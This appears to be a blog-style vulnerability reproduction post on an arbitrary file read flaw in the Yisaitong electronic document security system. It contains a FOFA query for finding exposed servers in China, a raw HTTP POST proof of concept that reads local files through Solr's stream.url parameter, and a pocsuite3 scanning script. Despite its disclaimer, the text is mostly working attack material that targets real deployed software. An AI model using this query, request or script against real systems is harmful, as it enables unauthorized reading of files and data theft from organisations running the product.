Vulnerability Recurrence-Yisaitong arbitrary file reading vulnerability (with vulnerability detection script)

Disclaimer

The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.

Vulnerability description

An arbitrary file reading vulnerability exists in an interface of Yisaitong Electronic Document Security Management System

fofa statement

"CDGServer3/index.jsp" && country="CN"

poc

POST /solr/flow/debug/dump?param=ContentStreams HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
 
stream.url=file:///C:\Program Files\

poc script

pocsuite framework for scripts

# _*_ coding:utf-8 _*_
# @Time : 2023/12/20
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
 
class yisaitong_fileread(POCBase):
    pocDesc = '''亿赛通某接口文件读取漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-20'
    name = '亿赛通某接口文件读取漏洞'
 
 
 
    def _verify(self):
 
        result = {}
        url = self.url+ '/solr/flow/debug/dump?param=ContentStreams'
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Cache-Control': 'max-age=0',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Content-Type": "application/x-www-form-urlencoded"
        }
 
        try:
            data = 'stream.url=file:///C:\Program Files\ '
 
            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200:
                result['VerifyInfo'] = {}
 
 
            return self.parse_output(result)
        except Exception as e:
            pass
 
register_poc(yisaitong_fileread)

Script exploit